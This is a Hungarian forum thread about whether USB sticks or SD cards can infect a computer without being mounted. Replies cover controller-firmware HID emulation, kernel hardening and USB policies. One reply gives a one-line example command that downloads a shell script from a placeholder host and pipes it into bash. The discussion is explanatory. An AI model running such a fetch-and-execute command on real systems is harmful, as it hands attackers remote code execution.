Sziasztok,
Letezik-e olyan virus, ami ugy is megfertozheti a gepet, hogy beledugunk a gepbe egy pendrive-ot/SD kartyat, de nem mountoljuk?
- 10617 megtekintés
Hozzászólások
Elvileg létezhet, hogy valamilyen sebezhetőséget triggerel az usb/stb. driver-ben, de konkrétan ilyenről még nem hallottam.
- A hozzászóláshoz be kell jelentkezni
Firewire -ről hallottam, nem in-the-wild, hanem laborban proof of concept módon. Ahhoz viszont driver bug sem kell, a szabvány így sikerült.
- A hozzászóláshoz be kell jelentkezni
van rá lehetőség, hogy hozzáférj egyes pendrive-ok és sd kártyák vezérlőihez. Bizonyos típusoknál ez a kontroller egy fix fpga, viszont vannak olyan (tipikusan silány minőségű) típusok ahol egy majdnem teljes értékű mikrokontrollert találsz beépítve a tokba. Itt aztán elszabadulhat a fantázia: bármilyen más usb-s eszközt emulálhatsz ha ügyes vagy, így pedig már van támadási vektorod.
lsd.: http://www.bunniestudios.com/blog/?p=3554
meg van valahol egy diasor is, de azt épp sehol nem lelem.
- A hozzászóláshoz be kell jelentkezni
Köszi a linket, nekem is ez a cikk jutott eszembe, de mivel elég ködösen emlékeztem rá, nem kezdtem el kutatni.
/feliratkozás
- A hozzászóláshoz be kell jelentkezni
Mit jelent a tamadasi vektor?
"Felhasznaloi nyelven" mit lehet veghez vinni egy ilyen tamadassal?
- A hozzászóláshoz be kell jelentkezni
Alapvetoen itt ket irany van: egyreszt emulalhat egeret/billentyuzetet, amivel "begepelheti" azt hogy
wget http://game.ov.er/shell -O - | /bin/bash - ez a latszat ellenere egy teljesen valid tamadasi vektor pl. egy social engineering szituacioban.
Masreszt emulalhat kb. barmilyen usb eszkozt, es exploitalhatja a hozza tartozo kernel modult.
--
"You're NOT paranoid, we really are out to get you!"
- A hozzászóláshoz be kell jelentkezni
Ertem. Van olyan oprendszer, ami valamennyire vedett lehet az exploitokkal szemben?
Ugy tudom, hogy pl Ubuntunak van vedelme a buffer tulirassal szemben.
- A hozzászóláshoz be kell jelentkezni
Ez egy eleg szerteagazo problemakor. :)
Olyan oprendszer, ami ez ellen teljesen vedett lenne, nincs. Ha csokkenteni akarod a kockazatot, akkor ket iranyba lehet elindulni: vagy hardeneled a kernelt hogy nehezebb legyen exploitalni (ezt teszi a PaX), vagy megprobalhatod a rendszer USB-t kezelo reszet izolalni a fontos adatokat kezelotol (ilyet tud pl. a qubes).
--
"You're NOT paranoid, we really are out to get you!"
- A hozzászóláshoz be kell jelentkezni
Ha általános védelmet akarsz, akkor használhatsz egzotikus(*) rendszert (pl. AIX), mert arra valószínűleg kevesebb gonosz dolog van megírva.
De ha konkrét védelemről van szó, akkor az ellen nem véd, mert ha be akarnak törni, akkor AIX-hoz írnak expolitot (vagy ha úgy olcsóbb, akkor markolóval kibontják az egész géptermet, stb. stb.).
*) jójó, tudom :D
- A hozzászóláshoz be kell jelentkezni
bár eax jól leírta a választ, azt azért még hozzátenném, hogy ennek a kihasználhatóságához mindig szükséges a social engineering, azaz a felhasználót meg kell győznöd, hogy valamilyen okból dugja be a módosított kártyádat. Ugyan ezzel a módszerrel lehet telepíteni usb hosszabbítónak látszó keyloggert a billentyűzet elé, de ez már Jack Bauer szint... néha tényleg egyszerűbb ellopni a gépet és mint a széfnél, majd otthon szórakozni vele.
edit: azt kifelejtettem, hogy ezekért (is) van sok cégnél olyan policy, hogy NEM dughatsz be semmilyen kapott/hozott/nem céges pendriveot a céges hálózaton függő gépedbe.
- A hozzászóláshoz be kell jelentkezni
dnet ezt elég jól megvalósította :) :
http://techblog.vsza.hu/posts/Leaking_data_using_DIY_USB_HID_device.html
---------------------------------------------------
Hell is empty and all the devils are here.
-- Wm. Shakespeare, "The Tempest"
- A hozzászóláshoz be kell jelentkezni
Meg egy olyan kerdesem lenne, hogy ha mar valaki feltorte a gepemet, akkor egy vinyocserevel vedette lehet-e tenni ujra a masinat?
- A hozzászóláshoz be kell jelentkezni
igen
és gépcserével is
meg kikapcsolással is
de el is adhatod
- A hozzászóláshoz be kell jelentkezni
LOL :) hülye kérdésre hülye választ kapsz :)
- A hozzászóláshoz be kell jelentkezni
Ezzel a tánccal akármilyen vírus elkergethető a gépről! :D
- A hozzászóláshoz be kell jelentkezni
Eleg hulyen tettem fel a kerdest, az biztos.
Hallottam olyan virusrol, ami olyan helyre irja be magat, hogy egy oprendszer-ujratelepites utan is megmarad. Pl a rendorvirusrol is mondtak ilyent.
Nem igazan ertek az alacsony szintu dolgokhoz. Valaki meg tudja erositeni/cafolni ezt a virusos dolgot?
- A hozzászóláshoz be kell jelentkezni
A válasz nagyjából ott van, hogy a gép újratelepítés önmagában semmit se ér. A vírus nem az egérbe fog átköltözni vagy a monitorba, hanem a levelezésbe, a felhőben (vagy bármilyen, nem a gépen) tárolt fájlokba, és ha nincs megfelelő vírusvédelem, akkor bizony megint terjedni fog.
És az a vírusvédelem, ami mellett már megfertőződött a gép, bizony nem elégséges.
Szerintem amit tenni kell:
- megállapítani, hogy mi fertőzte meg a gépet, és ezt biztosan felismerő víruskeresőt találni, ha ez nem állapítható meg, mert a gépen már hemzsegnek az állatkák, akkor hitvitát generálni a hupon (vagy bárhol) hogy melyi a legjobb
- a gépet újratelepíteni, frissíteni
- víruskeresővel ellátni
- víruskeresőt frissíteni
- átnézetni vele legalább egy fertőzött mintacsoportot, hogy tényleg felismeri-e legalább azt, amiről tudni lehet hogy ott van
- útjára engedni a gépet, hogy töltse le a leveleket, szinkronizálja a felhős miegybeket, stb. stb.
Vodka, pezsgő, whisky kitölt és reményked.
Aztán persze lehet hogy vannak olyanok, amik képesek elbújni mikrokontrollerben, ide-oda, de azt nem az átlagemberek ellen vetik be. Szerintem.
- A hozzászóláshoz be kell jelentkezni
Koszonom mindenkinek a valaszokat. Az utolso reszt is kicsit hulyen fogalmaztam meg. Nincs megfertozve a gepem, hanem csak erdekesnek talalom az ilyesmit.
- A hozzászóláshoz be kell jelentkezni